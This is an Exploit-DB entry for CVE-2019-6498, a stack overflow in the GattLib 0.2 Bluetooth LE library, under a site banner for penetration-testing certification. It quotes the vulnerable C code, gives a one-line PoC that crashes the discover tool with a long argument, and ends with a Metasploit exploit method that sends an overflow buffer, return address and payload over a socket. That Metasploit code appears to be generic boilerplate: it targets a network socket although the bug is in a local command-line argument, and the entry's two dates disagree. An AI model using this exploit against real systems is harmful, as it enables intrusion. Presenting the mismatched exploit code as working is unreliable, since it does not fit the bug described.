GattLib 0.2 - Stack Buffer Overflow

EDB-ID:

46215




Platform:

Linux

Date:

2019-01-21


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

Exploit Title: stack-based overflow
# Date: 2019-11-21
# Exploit Author: Dhiraj Mishra
# Vendor Homepage: http://labapart.com/
# Software Link: https://github.com/labapart/gattlib/issues/81
# Version: 0.2
# Tested on: Linux 4.15.0-38-generic
# CVE: CVE-2019-6498
# References:
# https://github.com/labapart/gattlib/issues/81
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6498

## Summary:
While fuzzing gattlib (Gattlib is a library to access GATT information from
BLE (Bluetooth Low Energy) devices) using clang 6.0 with ASAN a stack-based
buffer-overflow was observed.

## Vulnerable code from gattlib.c
// Transform string from 'DA:94:40:95:E0:87' to 'dev_DA_94_40_95_E0_87'
strncpy(device_address_str, dst, sizeof(device_address_str));
for (i = 0; i < strlen(device_address_str); i++) {
if (device_address_str[i] == ':') {
device_address_str[i] = '_';
}
}

## Vulnerable code from discover.c
if (argc != 2) {
printf("%s <device_address>\n", argv[0]);
return 1;
}

connection = gattlib_connect(NULL, argv[1], BDADDR_LE_PUBLIC, BT_SEC_LOW,
0, 0);
if (connection == NULL) {
fprintf(stderr, "Fail to connect to the bluetooth device.\n");
return 1;
}

## PoC

./discover `python -c 'print "A"*20'`

## MSF code

def exploit
    connect

    print_status("Sending #{payload.encoded.length} byte payload...")

    # Building the buffer for transmission
    buf = "A" * 20
    buf += [ target.ret ].pack('V')
    buf += payload.encoded

    sock.put(buf)
    sock.get

    handler
end